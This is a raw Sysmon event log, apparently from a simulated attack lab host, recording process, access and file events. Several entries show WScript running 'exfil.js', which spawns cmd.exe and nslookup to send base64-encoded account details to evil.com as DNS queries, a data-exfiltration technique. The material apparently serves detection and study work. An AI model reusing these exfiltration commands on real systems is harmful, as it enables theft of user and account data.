14:21:32.628{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrrze.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{2E1864BB-18EC-629A-C143-000000005F02}62002520C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-C243-000000005F02}2704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C243-000000005F02}2704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.597{2E1864BB-18EC-629A-C043-000000005F02}69804776C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-C243-000000005F02}2704C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{2E1864BB-18EC-629A-C243-000000005F02}2704C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-C043-000000005F02}6980C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrrze.tmp 2>&1 10341000x8000000000000000209205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.581{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-C143-000000005F02}6200C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.581{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-C143-000000005F02}6200C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.581{2E1864BB-18EC-629A-C143-000000005F02}62002520C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-C043-000000005F02}6980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C143-000000005F02}6200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-C043-000000005F02}6980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-18E0-629A-6742-000000005F02}39766396C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-C043-000000005F02}6980C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.563{2E1864BB-18EC-629A-C043-000000005F02}6980C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrrze.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.559{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrkyn.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.528{2E1864BB-18EC-629A-BE43-000000005F02}56241772C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-BF43-000000005F02}8112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.512{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-BF43-000000005F02}8112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.512{2E1864BB-18EC-629A-BD43-000000005F02}75327672C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-BF43-000000005F02}8112C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.523{2E1864BB-18EC-629A-BF43-000000005F02}8112C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-BD43-000000005F02}7532C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrkyn.tmp 2>&1 10341000x8000000000000000209185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.497{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-BE43-000000005F02}5624C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.497{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-BE43-000000005F02}5624C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.481{2E1864BB-18EC-629A-BE43-000000005F02}56241772C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-BD43-000000005F02}7532C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.481{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-BE43-000000005F02}5624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 